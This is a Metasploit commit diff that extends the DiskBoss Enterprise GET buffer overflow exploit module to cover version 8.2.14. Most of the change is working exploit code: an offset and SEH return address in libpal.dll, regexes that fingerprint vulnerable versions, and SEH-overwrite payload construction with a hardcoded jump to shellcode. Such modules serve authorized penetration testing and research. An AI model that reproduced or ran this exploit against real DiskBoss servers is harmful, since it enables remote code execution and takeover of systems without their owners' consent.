Update DiskBoss Module (EDB 42395)

jrobles-r7 · jrobles-r7 · commit c79186593adc · 2017-12-01T15:08:57.000-06:00
Added a new target option for the
DiskBoss Server.
diff --git a/modules/exploits/windows/http/diskboss_get_bof.rb b/modules/exploits/windows/http/diskboss_get_bof.rb
@@ -14,20 +14,23 @@ def initialize(info = {})
       'Name'           => 'DiskBoss Enterprise GET Buffer Overflow',
       'Description'    => %q{
           This module exploits a stack-based buffer overflow vulnerability
-        in the web interface of DiskBoss Enterprise v7.5.12 and v7.4.28,
+        in the web interface of DiskBoss Enterprise v7.5.12, v7.4.28, and v8.2.14,
         caused by improper bounds checking of the request path in HTTP GET
         requests sent to the built-in web server. This module has been
         tested successfully on Windows XP SP3 and Windows 7 SP1.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'vportal',      # Vulnerability discovery and PoC
-          'Gabor Seljan'  # Metasploit module
+          'vportal',        # Vulnerability discovery and PoC
+          'Gabor Seljan',   # Metasploit module
+          'Ahmad Mahfouz',  # Vulnerability discovery and PoC
+          'Jacob Robles'    # Metasploit module
         ],
       'References'     =>
         [
-          ['EDB', '40869']
+          ['EDB', '40869'],
+          ['EDB', '42395']
         ],
       'DefaultOptions' =>
         {
@@ -60,6 +63,13 @@ def initialize(info = {})
               'Offset' => 2471,
               'Ret'    => 0x100461da  # ADD ESP,0x68 # RETN [libpal.dll]
             }
+          ],
+          [
+            'DiskBoss Enterprise v8.2.14',
+            {
+              'Offset' => 2496,
+              'Ret'    => 0x1002A8CA  # SEH : # POP EDI # POP ESI # RET 04 [libpal.dll]
+            }
           ]
         ],
       'Privileged'     => true,
@@ -74,7 +84,7 @@ def check
     )
 
     if res && res.code == 200
-      if res.body =~ /DiskBoss Enterprise v7\.(4\.28|5\.12)/
+      if res.body =~ /DiskBoss Enterprise v(7\.4\.28|7\.5\.12|8\.2\.14)/
         return Exploit::CheckCode::Vulnerable
       elsif res.body =~ /DiskBoss Enterprise/
         return Exploit::CheckCode::Detected
@@ -105,6 +115,8 @@ def exploit
           mytarget = targets[1]
         elsif res.body =~ /DiskBoss Enterprise v7\.5\.12/
           mytarget = targets[2]
+        elsif res.body =~ /DiskBoss Enterprise v8\.2\.14/
+          mytarget = targets[3]
         end
       end
 
@@ -115,11 +127,22 @@ def exploit
       print_status("Selected Target: #{mytarget.name}")
     end
 
-    sploit =  make_nops(21)
-    sploit << payload.encoded
-    sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
-    sploit << [mytarget.ret].pack('V')
-    sploit << rand_text_alpha(2500)
+    if !(mytarget == targets[3])
+      sploit =  make_nops(21)
+      sploit << payload.encoded
+      sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
+      sploit << [mytarget.ret].pack('V')
+      sploit << rand_text_alpha(2500)
+    else
+      seh = generate_seh_record(mytarget.ret)
+      sploit = payload.encoded
+      sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
+      sploit[sploit.length, seh.length] = seh
+      sploit <<  make_nops(10)
+      sploit << "\xE9\x25\xBF\xFF\xFF"   # JMP to ShellCode
+      sploit << rand_text_alpha(5000 - sploit.length)
+
+    end
 
     send_request_cgi(
       'method' => 'GET',
